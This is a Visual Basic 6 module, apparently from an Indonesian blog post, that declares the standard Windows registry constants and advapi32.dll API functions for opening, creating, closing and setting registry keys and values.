Public Const KEY_CREATE_LINK = &H20
Public Const KEY_CREATE_SUB_KEY = &H4
Public Const KEY_ENUMERATE_SUB_KEYS = &H8
Public Const KEY_EXECUTE = &H20019
Public Const KEY_NOTIFY = &H10
Public Const KEY_QUERY_VALUE = &H1
Public Const KEY_READ = &H20019
Public Const KEY_SET_VALUE = &H2
Public Const KEY_WRITE = &H20006

Public Const REG_CREATED_NEW_KEY = &H1
Public Const REG_DWORD_BIG_ENDIAN = 5
Public Const REG_DWORD_LITTLE_ENDIAN = 4
Public Const REG_DWORD = 4
Public Const REG_EXPAND_SZ = 2
Public Const REG_LINK = 6
Public Const REG_MULTI_SZ = 7
Public Const REG_NONE = 0
Public Const REG_RESOURCE_LIST = 8
Public Const REG_SZ = 1
Public Const REG_BINARY = 3

Public Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias _
"RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, _
ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Public Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Public Declare Function RegCreateKeyEx Lib "advapi32.dll" Alias _
"RegCreateKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, _
ByVal Reserved As Long, ByVal lpClass As String, ByVal dwOptions _
As Long, ByVal samDesired As Long, lpSecurityAttributes As SECURITY_ATTRIBUTES, _
phkResult As Long, lpdwDisposition As Long) As Long
Public Declare Function RegSetValue Lib "advapi32.dll" Alias _
"RegSetValueA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal _
dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" _
(ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, _
ByVal dwType As Long, lpData As String, ByVal cbData As Long) As Long

‘//////////////////////////////////AKHIR KODE MODUL/////////////////////////////
Posted on 23.34 by aZi and filed under | 0 Comments »